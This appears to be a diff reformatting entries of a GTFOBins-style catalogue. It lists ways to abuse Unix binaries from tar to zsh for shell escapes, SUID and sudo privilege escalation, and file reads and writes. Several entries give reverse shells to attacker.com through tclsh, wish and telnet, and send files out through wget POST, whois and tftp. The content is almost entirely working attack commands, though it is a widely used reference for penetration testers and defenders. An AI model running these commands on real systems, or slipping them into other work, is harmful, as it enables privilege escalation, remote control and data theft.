- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: taskset 1 /bin/sh
- code: taskset 1 /bin/sh
suid-enabled:
- code: "./taskset 1 /bin/sh -p"
- code: ./taskset 1 /bin/sh -p
sudo-enabled:
- code: sudo taskset 1 /bin/sh
- code: sudo taskset 1 /bin/sh
---

View File

@ -1,21 +1,21 @@
---
functions:
execute-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
---

View File

@ -1,18 +1,16 @@
---
description: 'It can only append data if the destination exists.
'
description: It can only append data if the destination exists.
functions:
file-write:
- code: |
LFILE=file_to_write
echo data | ./tee -a "$LFILE"
- code: |
LFILE=file_to_write
echo data | ./tee -a "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_write
echo data | ./tee -a "$LFILE"
- code: |
LFILE=file_to_write
echo data | ./tee -a "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_write
echo data | sudo tee -a "$LFILE"
- code: |
LFILE=file_to_write
echo data | sudo tee -a "$LFILE"
---

View File

@ -1,35 +1,35 @@
---
functions:
execute-interactive:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/sh
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/sh
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh
---

View File

@ -1,15 +1,15 @@
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
---

View File

@ -1,12 +1,10 @@
---
description: |
Note that the shell might have its own builtin time implementation, which may
behave differently than` /usr/bin/time`, hence the absolute path.
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
functions:
execute-interactive:
- code: "/usr/bin/time /bin/sh"
- code: /usr/bin/time /bin/sh
suid-enabled:
- code: "./time /bin/sh -p"
- code: ./time /bin/sh -p
sudo-enabled:
- code: sudo /usr/bin/time /bin/sh
- code: sudo /usr/bin/time /bin/sh
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: timeout 7d /bin/sh
- code: timeout 7d /bin/sh
suid-enabled:
- code: "./timeout 7d /bin/sh -p"
- code: ./timeout 7d /bin/sh -p
sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh
- code: sudo timeout --foreground 7d /bin/sh
---

View File

@ -1,18 +1,16 @@
---
description: |
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
functions:
file-read:
- code: |
LFILE=file_to_read
ul "$LFILE"
- code: |
LFILE=file_to_read
ul "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./ul "$LFILE"
- code: |
LFILE=file_to_read
./ul "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo ul "$LFILE"
- code: |
LFILE=file_to_read
sudo ul "$LFILE"
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
unexpand -t99999999 "$LFILE"
- code: |
LFILE=file_to_read
unexpand -t99999999 "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./unexpand -t99999999 "$LFILE"
- code: |
LFILE=file_to_read
./unexpand -t99999999 "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE"
- code: |
LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE"
---

View File

@ -1,18 +1,16 @@
---
description: 'The read file content is corrupted by squashing multiple adjacent lines.
'
description: The read file content is corrupted by squashing multiple adjacent lines.
functions:
file-read:
- code: |
LFILE=file_to_read
uniq "$LFILE"
- code: |
LFILE=file_to_read
uniq "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./uniq "$LFILE"
- code: |
LFILE=file_to_read
./uniq "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo uniq "$LFILE"
- code: |
LFILE=file_to_read
sudo uniq "$LFILE"
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: unshare /bin/sh
- code: unshare /bin/sh
suid-enabled:
- code: "./unshare -r /bin/sh"
- code: ./unshare -r /bin/sh
sudo-enabled:
- code: sudo unshare /bin/sh
- code: sudo unshare /bin/sh
---

View File

@ -1,21 +1,19 @@
---
functions:
execute-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi
:set shell=/bin/sh
:shell
- code: vi -c ':!/bin/sh'
- code: |
vi
:set shell=/bin/sh
:shell
file-write:
- code: |
vi file_to_write
w
- code: |
vi file_to_write
w
file-read:
- code: 'vi file_to_read
'
- code: vi file_to_read
suid-enabled:
- code: "./vi -c ':!/bin/sh -p'"
- code: ./vi -c ':!/bin/sh -p'
sudo-enabled:
- code: sudo vi -c ':!/bin/sh'
- code: sudo vi -c ':!/bin/sh'
---

View File

@ -1,12 +1,12 @@
---
functions:
execute-non-interactive:
- code: watch /usr/bin/id
- code: watch /usr/bin/id
suid-enabled:
- description: This keeps the SUID privileges only if the `-x` option is present.
code: "./watch -x /usr/bin/id"
- description: This keeps the SUID privileges only if the `-x` option is present.
code: ./watch -x /usr/bin/id
sudo-enabled:
- code: sudo watch /usr/bin/id
- code: sudo watch /usr/bin/id
suid-limited:
- code: "./watch /usr/bin/id"
- code: ./watch /usr/bin/id
---

View File

@ -1,16 +1,15 @@
---
functions:
upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILE
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILE
---

View File

@ -1,37 +1,31 @@
---
description: "`whois` hangs waiting for the remote peer to close the socket.\n"
description: |
`whois` hangs waiting for the remote peer to close the socket.
functions:
upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
and its length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file
length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download:
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
< "file_to_send"` on the attacker box to send the file. The file has instances
of `$'\x0d'` stripped.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
| nc -l -p 12345` on the attacker box to send the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
---

View File

@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
sudo-enabled:
- code: |
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr
- code: |
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr
---

View File

@ -1,16 +1,14 @@
---
functions:
execute-non-interactive:
- code: xargs -a /dev/null /usr/bin/id
- code: xargs -a /dev/null /usr/bin/id
file-read:
- description: This works as long as the file does not contain the NUL character,
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
GNU version only.
code: |
LFILE=file_to_read
xargs -a "$LFILE" -0
- description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
code: |
LFILE=file_to_read
xargs -a "$LFILE" -0
suid-enabled:
- code: "./xargs -a /dev/null /usr/bin/id"
- code: ./xargs -a /dev/null /usr/bin/id
sudo-enabled:
- code: sudo xargs -a /dev/null /usr/bin/id
- code: sudo xargs -a /dev/null /usr/bin/id
---

View File

@ -1,19 +1,19 @@
---
functions:
file-write:
- code: |
LFILE=file_to_write
echo data | xxd | xxd -r - "$LFILE"
- code: |
LFILE=file_to_write
echo data | xxd | xxd -r - "$LFILE"
file-read:
- code: |
LFILE=file_to_read
xxd "$LFILE" | xxd -r
- code: |
LFILE=file_to_read
xxd "$LFILE" | xxd -r
suid-enabled:
- code: |
LFILE=file_to_read
./xxd "$LFILE" | xxd -r
- code: |
LFILE=file_to_read
./xxd "$LFILE" | xxd -r
sudo-enabled:
- code: |
LFILE=file_to_read
sudo xxd "$LFILE" | xxd -r
- code: |
LFILE=file_to_read
sudo xxd "$LFILE" | xxd -r
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: zsh
- code: zsh
suid-enabled:
- code: "./zsh"
- code: ./zsh
sudo-enabled:
- code: sudo zsh
- code: sudo zsh
---